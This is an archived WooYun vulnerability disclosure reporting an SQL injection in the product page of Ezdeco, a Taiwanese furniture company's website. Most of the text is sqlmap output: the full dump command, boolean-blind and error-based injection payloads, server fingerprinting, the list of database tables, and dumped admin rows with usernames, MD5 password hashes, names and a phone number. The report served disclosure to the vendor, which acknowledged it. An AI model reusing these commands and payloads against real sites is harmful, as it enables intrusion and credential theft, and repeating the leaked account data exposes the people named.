乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
易利迪科( Ezdeco,ezsy decoration),成立於2006年, 為提供系統家具、廚具和裝潢服務的專業公司。深知,家,是所有可能的起點,所以我們希望以透明平實的價格、 新的裝潢思維,專業設計和貼心順暢的服務,提供給您友善的購物環境。
地址:http://**.**.**.**/product.php?product_id=169
$ python sqlmap.py -u "http://**.**.**.**/product.php?product_id=169" -p product_id --technique=BE --random-agent --batch --no-cast -D ezdecowww -T admin -C admin_id,password,phone,username,name,mail --dump --output-dir=output
Database: ezdecowwwTable: admin[2 entries]+----------+----------------------------------+---------------+----------+------+--------------------+| admin_id | password | phone | username | name | mail |+----------+----------------------------------+---------------+----------+------+--------------------+| 1 | 46b2b3e13d79a5fec9ec0e09c563cd5a | (02)2827-9788 | ezdeco | 工程師 | service@**.**.**.** || 2 | 9287dd0c77efbac55298c54e243beb18 | | admin | 左小姐 | |+----------+----------------------------------+---------------+----------+------+--------------------+
---Parameter: product_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=169' AND 4498=4498 AND 'Okvp'='Okvp Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=169' AND (SELECT 1933 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(1933=1933,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wtjw'='wtjw---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0current user: 'ezdecowww@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'ezdecowww'@'localhost'Database: ezdecowww+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| file | 1082 || contact | 876 || contact_detail | 876 || contact_reply | 876 || product | 582 || product_detail | 581 || epaper_user | 412 || case_image | 204 || epaper_log_record | 90 || content | 66 || content_detail | 66 || page | 63 || page_detail | 63 || epaper_log | 51 || model_block | 43 || config | 33 || product_categories | 27 || page_plate | 23 || `case` | 21 || model | 14 || advertise_detail | 12 || file_categories | 11 || cache | 6 || case_categories | 5 || contact_categories | 5 || epaper | 5 || epaper_detail | 5 || order_pay | 4 || content_categories | 3 || admin | 2 || advertise | 2 || epaper_categories | 2 || forum | 2 || member_level | 2 || autolink | 1 || order_freight | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 572 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || STATISTICS | 111 || TABLES | 80 || KEY_COLUMN_USAGE | 60 || TABLE_CONSTRAINTS | 60 || CHARACTER_SETS | 36 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ezdecowwwTable: admin[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: ezdecowwwTable: member[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: ezdecowwwTable: admin[2 entries]+----------------------------------+| password |+----------------------------------+| 46b2b3e13d79a5fec9ec0e09c563cd5a || 9287dd0c77efbac55298c54e243beb18 |+----------------------------------+Database: ezdecowwwTable: member[0 entries]+----------+| password |+----------++----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: product_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=169' AND 4498=4498 AND 'Okvp'='Okvp Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=169' AND (SELECT 1933 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(1933=1933,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wtjw'='wtjw---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0Database: ezdecowwwTable: admin[11 columns]+----------+---------------------+| Column | Type |+----------+---------------------+| level | varchar(30) || address | varchar(100) || admin_id | tinyint(3) unsigned || company | varchar(30) || mail | varchar(60) || name | varchar(30) || password | varchar(32) || phone | varchar(30) || url | varchar(100) || username | varchar(50) || within | varchar(100) |+----------+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: product_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=169' AND 4498=4498 AND 'Okvp'='Okvp Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=169' AND (SELECT 1933 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(1933=1933,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wtjw'='wtjw---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0Database: ezdecowwwTable: admin[2 entries]+----------+----------------------------------+---------------+----------+------+--------------------+| admin_id | password | phone | username | name | mail |+----------+----------------------------------+---------------+----------+------+--------------------+| 1 | 46b2b3e13d79a5fec9ec0e09c563cd5a | (02)2827-9788 | ezdeco | 工程師 | service@**.**.**.** || 2 | 9287dd0c77efbac55298c54e243beb18 | | admin | 左小姐 | |+----------+----------------------------------+---------------+----------+------+--------------------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-12-04 20:47
感謝通報
暂无